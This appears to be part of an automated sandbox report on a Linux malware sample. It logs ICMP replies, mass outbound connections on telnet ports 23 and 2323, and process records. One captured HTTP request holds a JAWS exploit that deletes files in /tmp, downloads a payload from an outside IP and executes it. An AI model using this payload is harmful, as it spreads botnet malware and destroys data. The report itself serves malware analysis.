      01/15/22-00:45:11.778030ICMP449ICMP Time-To-Live Exceeded in Transit207.28.249.218192.168.2.23
      01/15/22-00:45:12.665984ICMP401ICMP Destination Unreachable Network Unreachable170.251.200.100192.168.2.23
      01/15/22-00:45:12.671770ICMP399ICMP Destination Unreachable Host Unreachable219.65.44.206192.168.2.23
      01/15/22-00:45:12.675089ICMP402ICMP Destination Unreachable Port Unreachable93.120.28.104192.168.2.23
      01/15/22-00:45:12.687558ICMP449ICMP Time-To-Live Exceeded in Transit118.91.228.242192.168.2.23
      01/15/22-00:45:12.795604ICMP449ICMP Time-To-Live Exceeded in Transit162.220.16.1192.168.2.23
      01/15/22-00:45:12.800916ICMP399ICMP Destination Unreachable Host Unreachable135.181.79.62192.168.2.23
      01/15/22-00:45:12.829402ICMP486ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited160.121.208.43192.168.2.23
      01/15/22-00:45:13.654197ICMP399ICMP Destination Unreachable Host Unreachable10.90.0.2192.168.2.23
      01/15/22-00:45:13.660567ICMP399ICMP Destination Unreachable Host Unreachable32.142.56.194192.168.2.23
      01/15/22-00:45:13.738613ICMP401ICMP Destination Unreachable Network Unreachable40.142.90.146192.168.2.23
      01/15/22-00:45:13.776553ICMP449ICMP Time-To-Live Exceeded in Transit82.117.210.161192.168.2.23
      01/15/22-00:45:13.811707ICMP486ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited163.197.5.171192.168.2.23
      01/15/22-00:45:13.827589ICMP449ICMP Time-To-Live Exceeded in Transit41.78.220.250192.168.2.23
      01/15/22-00:45:13.857191ICMP449ICMP Time-To-Live Exceeded in Transit187.130.101.161192.168.2.23
      01/15/22-00:45:13.908447ICMP399ICMP Destination Unreachable Host Unreachable1.213.92.238192.168.2.23
      01/15/22-00:45:14.533764ICMP485ICMP Destination Unreachable Communication Administratively Prohibited77.9.109.134192.168.2.23
      01/15/22-00:45:14.538156ICMP399ICMP Destination Unreachable Host Unreachable168.224.170.93192.168.2.23
      01/15/22-00:45:14.546664ICMP485ICMP Destination Unreachable Communication Administratively Prohibited92.216.37.57192.168.2.23
      01/15/22-00:45:14.581114ICMP399ICMP Destination Unreachable Host Unreachable185.229.125.254192.168.2.23
      01/15/22-00:45:14.618807ICMP399ICMP Destination Unreachable Host Unreachable192.168.200.1192.168.2.23
      01/15/22-00:45:14.671499ICMP485ICMP Destination Unreachable Communication Administratively Prohibited93.232.183.27192.168.2.23
      01/15/22-00:45:14.672906ICMP485ICMP Destination Unreachable Communication Administratively Prohibited87.164.110.18192.168.2.23
      01/15/22-00:45:14.688099ICMP485ICMP Destination Unreachable Communication Administratively Prohibited93.217.36.213192.168.2.23
      01/15/22-00:45:14.692800ICMP399ICMP Destination Unreachable Host Unreachable82.102.80.113192.168.2.23
      01/15/22-00:45:14.709109ICMP399ICMP Destination Unreachable Host Unreachable109.236.95.227192.168.2.23
      01/15/22-00:45:14.760676ICMP449ICMP Time-To-Live Exceeded in Transit69.17.199.233192.168.2.23
      01/15/22-00:45:14.771121ICMP401ICMP Destination Unreachable Network Unreachable24.142.57.66192.168.2.23
      01/15/22-00:45:14.793825ICMP401ICMP Destination Unreachable Network Unreachable150.99.189.2192.168.2.23
      01/15/22-00:45:14.817385ICMP449ICMP Time-To-Live Exceeded in Transit190.242.149.66192.168.2.23
      01/15/22-00:45:14.855445ICMP449ICMP Time-To-Live Exceeded in Transit192.153.159.60192.168.2.23
      01/15/22-00:45:14.872111ICMP399ICMP Destination Unreachable Host Unreachable167.98.212.156192.168.2.23
      01/15/22-00:45:15.541363ICMP485ICMP Destination Unreachable Communication Administratively Prohibited217.249.207.119192.168.2.23
      01/15/22-00:45:15.552989ICMP401ICMP Destination Unreachable Network Unreachable78.10.160.251192.168.2.23
      01/15/22-00:45:15.672756ICMP485ICMP Destination Unreachable Communication Administratively Prohibited2.228.244.70192.168.2.23
      01/15/22-00:45:15.684374ICMP485ICMP Destination Unreachable Communication Administratively Prohibited89.247.159.237192.168.2.23
      01/15/22-00:45:15.846556ICMP449ICMP Time-To-Live Exceeded in Transit173.246.228.50192.168.2.23
      01/15/22-00:45:15.901298ICMP399ICMP Destination Unreachable Host Unreachable120.72.94.70192.168.2.23
      01/15/22-00:45:16.001640ICMP399ICMP Destination Unreachable Host Unreachable41.184.206.6192.168.2.23
      01/15/22-00:45:16.677459ICMP485ICMP Destination Unreachable Communication Administratively Prohibited84.164.133.84192.168.2.23
      01/15/22-00:45:16.678903ICMP485ICMP Destination Unreachable Communication Administratively Prohibited93.195.173.118192.168.2.23
      01/15/22-00:45:16.727747ICMP449ICMP Time-To-Live Exceeded in Transit89.106.28.2192.168.2.23
      01/15/22-00:45:16.790191ICMP449ICMP Time-To-Live Exceeded in Transit121.120.104.254192.168.2.23
      01/15/22-00:45:16.879790ICMP449ICMP Time-To-Live Exceeded in Transit177.73.40.17192.168.2.23
      01/15/22-00:45:16.911316ICMP399ICMP Destination Unreachable Host Unreachable93.93.192.114192.168.2.23
      01/15/22-00:45:17.660477ICMP399ICMP Destination Unreachable Host Unreachable148.187.0.220192.168.2.23
      01/15/22-00:45:17.967765ICMP399ICMP Destination Unreachable Host Unreachable196.240.124.2192.168.2.23
      01/15/22-00:45:18.209936ICMP402ICMP Destination Unreachable Port Unreachable89.180.183.224192.168.2.23
      01/15/22-00:45:18.821820ICMP399ICMP Destination Unreachable Host Unreachable74.129.242.54192.168.2.23
      01/15/22-00:45:19.543644ICMP399ICMP Destination Unreachable Host Unreachable212.111.1.76192.168.2.23
      01/15/22-00:45:19.830214ICMP399ICMP Destination Unreachable Host Unreachable64.156.97.18192.168.2.23
      01/15/22-00:45:29.553350ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.23192.168.2.1
      01/15/22-00:46:49.582129ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.23192.168.2.1

      Network Port Distribution

      TCP Packets

      TimestampSource PortDest PortSource IPDest IP
      Jan 15, 2022 00:45:03.467309952 CET172632323192.168.2.2359.56.176.218
      Jan 15, 2022 00:45:03.467410088 CET1726323192.168.2.23171.8.147.10
      Jan 15, 2022 00:45:03.467418909 CET1726323192.168.2.23117.10.193.218
      Jan 15, 2022 00:45:03.467452049 CET1726323192.168.2.23125.203.73.149
      Jan 15, 2022 00:45:03.467457056 CET1726323192.168.2.2393.124.75.115
      Jan 15, 2022 00:45:03.467466116 CET1726323192.168.2.2345.28.151.44
      Jan 15, 2022 00:45:03.467473984 CET1726323192.168.2.23168.122.77.69
      Jan 15, 2022 00:45:03.467531919 CET1726323192.168.2.23111.231.133.154
      Jan 15, 2022 00:45:03.467540979 CET172632323192.168.2.2342.72.218.69
      Jan 15, 2022 00:45:03.467555046 CET1726323192.168.2.23124.111.175.215
      Jan 15, 2022 00:45:03.467564106 CET1726323192.168.2.23107.197.27.28
      Jan 15, 2022 00:45:03.467571020 CET1726323192.168.2.23116.96.54.65
      Jan 15, 2022 00:45:03.467586994 CET1726323192.168.2.23118.121.103.45
      Jan 15, 2022 00:45:03.467588902 CET1726323192.168.2.2324.197.74.37
      Jan 15, 2022 00:45:03.467592001 CET1726323192.168.2.23163.145.193.9
      Jan 15, 2022 00:45:03.467590094 CET1726323192.168.2.23134.155.92.44
      Jan 15, 2022 00:45:03.467592955 CET1726323192.168.2.23183.237.208.127
      Jan 15, 2022 00:45:03.467593908 CET1726323192.168.2.23195.22.149.59
      Jan 15, 2022 00:45:03.467597961 CET1726323192.168.2.23220.171.237.96
      Jan 15, 2022 00:45:03.467598915 CET172632323192.168.2.23137.130.224.50
      Jan 15, 2022 00:45:03.467605114 CET1726323192.168.2.23173.210.213.104
      Jan 15, 2022 00:45:03.467608929 CET1726323192.168.2.23141.248.156.246
      Jan 15, 2022 00:45:03.467614889 CET1726323192.168.2.23219.139.170.176
      Jan 15, 2022 00:45:03.467617989 CET1726323192.168.2.23209.161.166.222
      Jan 15, 2022 00:45:03.467621088 CET1726323192.168.2.23134.10.239.120
      Jan 15, 2022 00:45:03.467632055 CET1726323192.168.2.2343.62.31.90
      Jan 15, 2022 00:45:03.467636108 CET1726323192.168.2.2312.78.157.250
      Jan 15, 2022 00:45:03.467641115 CET1726323192.168.2.2359.174.231.21
      Jan 15, 2022 00:45:03.467641115 CET1726323192.168.2.2336.255.173.8
      Jan 15, 2022 00:45:03.467645884 CET1726323192.168.2.23154.185.192.181
      Jan 15, 2022 00:45:03.467645884 CET1726323192.168.2.23223.48.19.162
      Jan 15, 2022 00:45:03.467647076 CET1726323192.168.2.23148.44.194.235
      Jan 15, 2022 00:45:03.467653036 CET1726323192.168.2.23105.70.94.103
      Jan 15, 2022 00:45:03.467655897 CET172632323192.168.2.232.152.239.194
      Jan 15, 2022 00:45:03.467657089 CET172632323192.168.2.2382.28.36.35
      Jan 15, 2022 00:45:03.467658043 CET1726323192.168.2.23101.157.180.96
      Jan 15, 2022 00:45:03.467658997 CET1726323192.168.2.23216.43.59.137
      Jan 15, 2022 00:45:03.467668056 CET1726323192.168.2.23190.57.223.135
      Jan 15, 2022 00:45:03.467670918 CET1726323192.168.2.2372.216.180.22
      Jan 15, 2022 00:45:03.467672110 CET1726323192.168.2.23154.216.6.37
      Jan 15, 2022 00:45:03.467674017 CET1726323192.168.2.2351.126.45.5
      Jan 15, 2022 00:45:03.467674971 CET1726323192.168.2.23158.14.135.163
      Jan 15, 2022 00:45:03.467675924 CET1726323192.168.2.2335.136.38.83
      Jan 15, 2022 00:45:03.467679024 CET1726323192.168.2.23139.106.192.0
      Jan 15, 2022 00:45:03.467681885 CET1726323192.168.2.23119.31.153.65
      Jan 15, 2022 00:45:03.467686892 CET1726323192.168.2.2387.203.165.240
      Jan 15, 2022 00:45:03.467690945 CET1726323192.168.2.2312.3.226.82
      Jan 15, 2022 00:45:03.467694044 CET1726323192.168.2.23112.190.123.116
      Jan 15, 2022 00:45:03.467696905 CET1726323192.168.2.23152.86.147.139
      Jan 15, 2022 00:45:03.467700005 CET172632323192.168.2.2395.92.170.188
      Jan 15, 2022 00:45:03.467703104 CET1726323192.168.2.23111.8.223.182
      Jan 15, 2022 00:45:03.467708111 CET1726323192.168.2.23171.34.91.29
      Jan 15, 2022 00:45:03.467710018 CET1726323192.168.2.23113.140.3.145
      Jan 15, 2022 00:45:03.467713118 CET1726323192.168.2.23111.123.140.32
      Jan 15, 2022 00:45:03.467715979 CET1726323192.168.2.23186.202.239.2
      Jan 15, 2022 00:45:03.467719078 CET1726323192.168.2.2352.67.246.145
      Jan 15, 2022 00:45:03.467720985 CET1726323192.168.2.23168.156.132.90
      Jan 15, 2022 00:45:03.467724085 CET1726323192.168.2.23100.242.108.168
      Jan 15, 2022 00:45:03.467725992 CET1726323192.168.2.2346.238.57.139
      Jan 15, 2022 00:45:03.467730999 CET172632323192.168.2.2370.10.33.63
      Jan 15, 2022 00:45:03.467736006 CET1726323192.168.2.23156.115.201.253
      Jan 15, 2022 00:45:03.467739105 CET1726323192.168.2.23116.13.138.43
      Jan 15, 2022 00:45:03.467742920 CET1726323192.168.2.2378.195.92.207
      Jan 15, 2022 00:45:03.467742920 CET1726323192.168.2.2357.141.187.159
      Jan 15, 2022 00:45:03.467746019 CET1726323192.168.2.23134.7.165.126
      Jan 15, 2022 00:45:03.467746019 CET1726323192.168.2.2353.7.198.170
      Jan 15, 2022 00:45:03.467747927 CET172632323192.168.2.23185.35.40.190
      Jan 15, 2022 00:45:03.467749119 CET1726323192.168.2.23222.194.171.25
      Jan 15, 2022 00:45:03.467756987 CET1726323192.168.2.23145.58.147.15
      Jan 15, 2022 00:45:03.467760086 CET1726323192.168.2.23105.50.55.223
      Jan 15, 2022 00:45:03.467763901 CET172632323192.168.2.2354.87.128.116
      Jan 15, 2022 00:45:03.467765093 CET1726323192.168.2.2390.158.243.215
      Jan 15, 2022 00:45:03.467768908 CET1726323192.168.2.23205.61.83.141
      Jan 15, 2022 00:45:03.467770100 CET1726323192.168.2.23166.164.99.106
      Jan 15, 2022 00:45:03.467771053 CET1726323192.168.2.23216.19.214.117
      Jan 15, 2022 00:45:03.467772961 CET1726323192.168.2.23135.34.255.170
      Jan 15, 2022 00:45:03.467777014 CET1726323192.168.2.23149.120.171.178
      Jan 15, 2022 00:45:03.467782021 CET1726323192.168.2.2345.254.202.153
      Jan 15, 2022 00:45:03.467782974 CET1726323192.168.2.2323.237.243.199
      Jan 15, 2022 00:45:03.467783928 CET1726323192.168.2.2338.240.232.34
      Jan 15, 2022 00:45:03.467783928 CET1726323192.168.2.2319.241.199.237
      Jan 15, 2022 00:45:03.467788935 CET1726323192.168.2.2345.87.143.21
      Jan 15, 2022 00:45:03.467788935 CET1726323192.168.2.2378.205.6.99
      Jan 15, 2022 00:45:03.467789888 CET1726323192.168.2.23100.185.212.96
      Jan 15, 2022 00:45:03.467794895 CET1726323192.168.2.23100.202.35.108
      Jan 15, 2022 00:45:03.467797995 CET1726323192.168.2.2317.55.23.235
      Jan 15, 2022 00:45:03.467799902 CET1726323192.168.2.2351.25.101.193
      Jan 15, 2022 00:45:03.467804909 CET1726323192.168.2.23184.190.237.12
      Jan 15, 2022 00:45:03.467808008 CET1726323192.168.2.23129.44.47.204
      Jan 15, 2022 00:45:03.467809916 CET1726323192.168.2.2392.0.119.32
      Jan 15, 2022 00:45:03.467811108 CET1726323192.168.2.2366.238.192.10
      Jan 15, 2022 00:45:03.467809916 CET172632323192.168.2.23166.3.148.104
      Jan 15, 2022 00:45:03.467814922 CET1726323192.168.2.2314.192.245.224
      Jan 15, 2022 00:45:03.467820883 CET1726323192.168.2.23179.164.31.116
      Jan 15, 2022 00:45:03.467823029 CET1726323192.168.2.2370.187.36.97
      Jan 15, 2022 00:45:03.467827082 CET1726323192.168.2.23217.238.241.42
      Jan 15, 2022 00:45:03.467828989 CET1726323192.168.2.23174.47.115.113
      Jan 15, 2022 00:45:03.467837095 CET1726323192.168.2.23217.215.226.5
      Jan 15, 2022 00:45:03.467839003 CET172632323192.168.2.23220.81.214.84
      Jan 15, 2022 00:45:03.467839956 CET1726323192.168.2.2327.142.144.254

      ICMP Packets

      TimestampSource IPDest IPChecksumCodeType
      Jan 15, 2022 00:45:03.644597054 CET64.89.161.25192.168.2.23de18(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:03.662995100 CET66.181.240.243192.168.2.231727(Time to live exceeded in transit)Time Exceeded
      Jan 15, 2022 00:45:04.140958071 CET10.63.5.86192.168.2.238ab6(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:04.500113964 CET84.46.13.8192.168.2.235836(Unknown)Destination Unreachable
      Jan 15, 2022 00:45:04.502104044 CET89.245.72.163192.168.2.2316d4(Unknown)Destination Unreachable
      Jan 15, 2022 00:45:04.519541979 CET31.179.111.91192.168.2.234ee5(Port unreachable)Destination Unreachable
      Jan 15, 2022 00:45:04.719774961 CET72.165.9.129192.168.2.235f26(Time to live exceeded in transit)Time Exceeded
      Jan 15, 2022 00:45:04.750848055 CET103.126.144.49192.168.2.23b786(Port unreachable)Destination Unreachable
      Jan 15, 2022 00:45:04.767990112 CET153.127.55.217192.168.2.239128(Unknown)Destination Unreachable
      Jan 15, 2022 00:45:04.786693096 CET14.141.63.186192.168.2.23fca2(Time to live exceeded in transit)Time Exceeded
      Jan 15, 2022 00:45:05.699183941 CET191.183.77.70192.168.2.23ccd4(Port unreachable)Destination Unreachable
      Jan 15, 2022 00:45:06.500428915 CET118.107.66.183192.168.2.2378f2(Unknown)Destination Unreachable
      Jan 15, 2022 00:45:06.518023968 CET77.239.139.110192.168.2.23993a(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:06.542203903 CET79.205.220.52192.168.2.239b35(Unknown)Destination Unreachable
      Jan 15, 2022 00:45:06.660579920 CET119.15.135.78192.168.2.23d3(Net unreachable)Destination Unreachable
      Jan 15, 2022 00:45:06.708590031 CET68.186.64.241192.168.2.234578(Unknown)Destination Unreachable
      Jan 15, 2022 00:45:06.734232903 CET144.123.13.90192.168.2.235dac(Port unreachable)Destination Unreachable
      Jan 15, 2022 00:45:06.806562901 CET103.217.108.13192.168.2.23f350(Unknown)Destination Unreachable
      Jan 15, 2022 00:45:06.809870005 CET218.150.7.98192.168.2.237ead(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:06.910094976 CET170.247.115.122192.168.2.23ef40(Time to live exceeded in transit)Time Exceeded
      Jan 15, 2022 00:45:06.972640991 CET202.112.31.181192.168.2.23d550(Time to live exceeded in transit)Time Exceeded
      Jan 15, 2022 00:45:07.639422894 CET154.54.6.89192.168.2.235da2(Time to live exceeded in transit)Time Exceeded
      Jan 15, 2022 00:45:07.651789904 CET75.10.169.149192.168.2.238647(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:07.748393059 CET112.188.10.2192.168.2.23ae3a(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:08.132852077 CET83.33.246.134192.168.2.23981(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:08.530721903 CET159.171.80.147192.168.2.23b319(Time to live exceeded in transit)Time Exceeded
      Jan 15, 2022 00:45:08.547378063 CET84.153.189.171192.168.2.23b4f2(Unknown)Destination Unreachable
      Jan 15, 2022 00:45:08.619940042 CET50.242.148.249192.168.2.23a593(Unknown)Destination Unreachable
      Jan 15, 2022 00:45:08.624917984 CET216.115.200.170192.168.2.23f81e(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:08.654174089 CET84.17.32.179192.168.2.2342e0(Net unreachable)Destination Unreachable
      Jan 15, 2022 00:45:09.560024977 CET188.101.52.88192.168.2.23d679(Unknown)Destination Unreachable
      Jan 15, 2022 00:45:09.571100950 CET95.244.186.55192.168.2.23ad0b(Unknown)Destination Unreachable
      Jan 15, 2022 00:45:09.658113956 CET38.32.13.210192.168.2.23424f(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:09.673556089 CET76.108.107.125192.168.2.2377b6(Unknown)Destination Unreachable
      Jan 15, 2022 00:45:09.691894054 CET150.181.28.26192.168.2.23f49(Time to live exceeded in transit)Time Exceeded
      Jan 15, 2022 00:45:09.944854975 CET103.31.156.141192.168.2.2335ea(Time to live exceeded in transit)Time Exceeded
      Jan 15, 2022 00:45:10.144783020 CET153.35.122.230192.168.2.231ea9(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:10.442048073 CET58.159.231.38192.168.2.238fb0(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:10.527283907 CET206.189.21.127192.168.2.23a40c(Unknown)Destination Unreachable
      Jan 15, 2022 00:45:10.637758970 CET208.95.70.33192.168.2.23d3f4(Time to live exceeded in transit)Time Exceeded
      Jan 15, 2022 00:45:10.656616926 CET162.144.240.15192.168.2.237cff(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:10.667618036 CET216.244.88.167192.168.2.23f33c(Time to live exceeded in transit)Time Exceeded
      Jan 15, 2022 00:45:10.675945997 CET108.189.77.136192.168.2.23a250(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:10.677880049 CET212.200.42.153192.168.2.231f0e(Time to live exceeded in transit)Time Exceeded
      Jan 15, 2022 00:45:10.718549967 CET66.28.4.38192.168.2.23eb35(Time to live exceeded in transit)Time Exceeded
      Jan 15, 2022 00:45:10.727802992 CET64.59.80.57192.168.2.236daa(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:10.770072937 CET38.142.43.90192.168.2.2388dc(Time to live exceeded in transit)Time Exceeded
      Jan 15, 2022 00:45:10.864537954 CET86.159.98.192192.168.2.23793c(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:10.871674061 CET24.25.231.241192.168.2.23b091(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:11.535105944 CET188.97.76.226192.168.2.23b028(Unknown)Destination Unreachable
      Jan 15, 2022 00:45:11.546183109 CET94.53.25.118192.168.2.2395f7(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:11.548777103 CET185.163.106.189192.168.2.23e430(Unknown)Destination Unreachable
      Jan 15, 2022 00:45:11.648175955 CET4.28.96.162192.168.2.234dd(Time to live exceeded in transit)Time Exceeded
      Jan 15, 2022 00:45:11.728287935 CET89.202.172.245192.168.2.2311e0(Time to live exceeded in transit)Time Exceeded
      Jan 15, 2022 00:45:11.778029919 CET207.28.249.218192.168.2.23b4ff(Time to live exceeded in transit)Time Exceeded
      Jan 15, 2022 00:45:12.665983915 CET170.251.200.100192.168.2.23da8(Net unreachable)Destination Unreachable
      Jan 15, 2022 00:45:12.671770096 CET219.65.44.206192.168.2.234f04(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:12.675088882 CET93.120.28.104192.168.2.2339b7(Port unreachable)Destination Unreachable
      Jan 15, 2022 00:45:12.687557936 CET118.91.228.242192.168.2.23261b(Time to live exceeded in transit)Time Exceeded
      Jan 15, 2022 00:45:12.795603991 CET162.220.16.1192.168.2.23a29c(Time to live exceeded in transit)Time Exceeded
      Jan 15, 2022 00:45:12.800915956 CET135.181.79.62192.168.2.23c33a(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:12.829401970 CET160.121.208.43192.168.2.233075(Unknown)Destination Unreachable
      Jan 15, 2022 00:45:13.654196978 CET10.90.0.2192.168.2.239cfd(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:13.660567045 CET32.142.56.194192.168.2.23dc5b(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:13.738612890 CET40.142.90.146192.168.2.236142(Net unreachable)Destination Unreachable
      Jan 15, 2022 00:45:13.776552916 CET82.117.210.161192.168.2.235d00(Time to live exceeded in transit)Time Exceeded
      Jan 15, 2022 00:45:13.811707020 CET163.197.5.171192.168.2.236940(Unknown)Destination Unreachable
      Jan 15, 2022 00:45:13.827589035 CET41.78.220.250192.168.2.234b5e(Time to live exceeded in transit)Time Exceeded
      Jan 15, 2022 00:45:13.857191086 CET187.130.101.161192.168.2.2315fa(Time to live exceeded in transit)Time Exceeded
      Jan 15, 2022 00:45:13.908447027 CET1.213.92.238192.168.2.2355e4(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:14.533763885 CET77.9.109.134192.168.2.23fedc(Unknown)Destination Unreachable
      Jan 15, 2022 00:45:14.538156033 CET168.224.170.93192.168.2.232d84(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:14.546664000 CET92.216.37.57192.168.2.23375b(Unknown)Destination Unreachable
      Jan 15, 2022 00:45:14.581114054 CET185.229.125.254192.168.2.23f965(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:14.618807077 CET192.168.200.1192.168.2.231df4(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:14.671499014 CET93.232.183.27192.168.2.23b233(Unknown)Destination Unreachable
      Jan 15, 2022 00:45:14.672905922 CET87.164.110.18192.168.2.23181(Unknown)Destination Unreachable
      Jan 15, 2022 00:45:14.688098907 CET93.217.36.213192.168.2.234489(Unknown)Destination Unreachable
      Jan 15, 2022 00:45:14.692800045 CET82.102.80.113192.168.2.237471(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:14.709109068 CET109.236.95.227192.168.2.23d147(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:14.760675907 CET69.17.199.233192.168.2.23cb82(Time to live exceeded in transit)Time Exceeded
      Jan 15, 2022 00:45:14.771121025 CET24.142.57.66192.168.2.23e949(Net unreachable)Destination Unreachable
      Jan 15, 2022 00:45:14.793824911 CET150.99.189.2192.168.2.231aea(Net unreachable)Destination Unreachable
      Jan 15, 2022 00:45:14.817384958 CET190.242.149.66192.168.2.231d5f(Time to live exceeded in transit)Time Exceeded
      Jan 15, 2022 00:45:14.855444908 CET192.153.159.60192.168.2.235448(Time to live exceeded in transit)Time Exceeded
      Jan 15, 2022 00:45:14.872111082 CET167.98.212.156192.168.2.233dc2(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:15.541363001 CET217.249.207.119192.168.2.23ffb(Unknown)Destination Unreachable
      Jan 15, 2022 00:45:15.552989006 CET78.10.160.251192.168.2.2386e(Net unreachable)Destination Unreachable
      Jan 15, 2022 00:45:15.672755957 CET2.228.244.70192.168.2.23d00c(Unknown)Destination Unreachable
      Jan 15, 2022 00:45:15.684374094 CET89.247.159.237192.168.2.23cd52(Unknown)Destination Unreachable
      Jan 15, 2022 00:45:15.846555948 CET173.246.228.50192.168.2.23c764(Time to live exceeded in transit)Time Exceeded
      Jan 15, 2022 00:45:15.901298046 CET120.72.94.70192.168.2.2336c6(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:16.001640081 CET41.184.206.6192.168.2.231b62(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:16.677459002 CET84.164.133.84192.168.2.23ed3e(Unknown)Destination Unreachable
      Jan 15, 2022 00:45:16.678903103 CET93.195.173.118192.168.2.23bbfd(Unknown)Destination Unreachable
      Jan 15, 2022 00:45:16.727746964 CET89.106.28.2192.168.2.23216f(Time to live exceeded in transit)Time Exceeded
      Jan 15, 2022 00:45:16.790190935 CET121.120.104.254192.168.2.23ce02(Time to live exceeded in transit)Time Exceeded
      Jan 15, 2022 00:45:16.879790068 CET177.73.40.17192.168.2.2392c6(Time to live exceeded in transit)Time Exceeded
      Jan 15, 2022 00:45:16.911315918 CET93.93.192.114192.168.2.238c70(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:17.660476923 CET148.187.0.220192.168.2.23ead2(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:17.967765093 CET196.240.124.2192.168.2.23c451(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:18.209935904 CET89.180.183.224192.168.2.23b5ac(Port unreachable)Destination Unreachable
      Jan 15, 2022 00:45:18.821820021 CET74.129.242.54192.168.2.2320b5(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:19.543643951 CET212.111.1.76192.168.2.23acc4(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:19.830214024 CET64.156.97.18192.168.2.232493(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:29.553349972 CET192.168.2.23192.168.2.18283(Port unreachable)Destination Unreachable
      Jan 15, 2022 00:46:49.582129002 CET192.168.2.23192.168.2.18283(Port unreachable)Destination Unreachable

      HTTP Request Dependency Graph

      • 127.0.0.1:80

      HTTP Packets

      Session IDSource IPSource PortDestination IPDestination Port
      0192.168.2.2349312217.88.122.18960001
      TimestampkBytes transferredDirectionData
      Jan 15, 2022 00:45:09.575633049 CET209OUTGET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1
      User-Agent: Hello, world
      Host: 127.0.0.1:80
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
      Connection: keep-alive
      Jan 15, 2022 00:45:09.618828058 CET210INHTTP/1.1 404 Not Found
      Server: JAWS/1.0 Jan 21 2017
      Content-Type: text/html; charset=UTF-8
      Content-length: 213


      System Behavior

      Analysis Process: SLdtSSVlj2 PID: 5267 Parent PID: 5104

      General

      Start time:00:45:02
      Start date:15/01/2022
      Path:/tmp/SLdtSSVlj2
      Arguments:/tmp/SLdtSSVlj2
      File size:4379400 bytes
      MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

      Analysis Process: SLdtSSVlj2 PID: 5269 Parent PID: 5267

      General

      Start time:00:45:02
      Start date:15/01/2022
      Path:/tmp/SLdtSSVlj2
      Arguments:n/a
      File size:4379400 bytes
      MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

      Analysis Process: SLdtSSVlj2 PID: 5270 Parent PID: 5267

      General

      Start time:00:45:02
      Start date:15/01/2022
      Path:/tmp/SLdtSSVlj2
      Arguments:n/a
      File size:4379400 bytes
      MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

      Analysis Process: SLdtSSVlj2 PID: 5271 Parent PID: 5267

      General

      Start time:00:45:02
      Start date:15/01/2022
      Path:/tmp/SLdtSSVlj2
      Arguments:n/a
      File size:4379400 bytes
      MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

      Analysis Process: SLdtSSVlj2 PID: 5275 Parent PID: 5271

      General

      Start time:00:45:02
      Start date:15/01/2022
      Path:/tmp/SLdtSSVlj2
      Arguments:n/a
      File size:4379400 bytes
      MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

      Analysis Process: SLdtSSVlj2 PID: 5276 Parent PID: 5271

      General

      Start time:00:45:02
      Start date:15/01/2022
      Path:/tmp/SLdtSSVlj2
      Arguments:n/a
      File size:4379400 bytes
      MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

      Analysis Process: SLdtSSVlj2 PID: 5279 Parent PID: 5271

      General

      Start time:00:45:02
      Start date:15/01/2022
      Path:/tmp/SLdtSSVlj2
      Arguments:n/a
      File size:4379400 bytes
      MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

      Analysis Process: SLdtSSVlj2 PID: 5280 Parent PID: 5271

      General

      Start time:00:45:02
      Start date:15/01/2022
      Path:/tmp/SLdtSSVlj2
      Arguments:n/a
      File size:4379400 bytes
      MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

      Analysis Process: systemd PID: 5288 Parent PID: 1

      General

      Start time:00:45:11
      Start date:15/01/2022
      Path:/usr/lib/systemd/systemd
      Arguments:n/a
      File size:1620224 bytes
      MD5 hash:9b2bec7092a40488108543f9334aab75

      Analysis Process: journalctl PID: 5288 Parent PID: 1

      General

      Start time:00:45:11
      Start date:15/01/2022
      Path:/usr/bin/journalctl
      Arguments:/usr/bin/journalctl --smart-relinquish-var
      File size:80120 bytes
      MD5 hash:bf3a987344f3bacafc44efd882abda8b

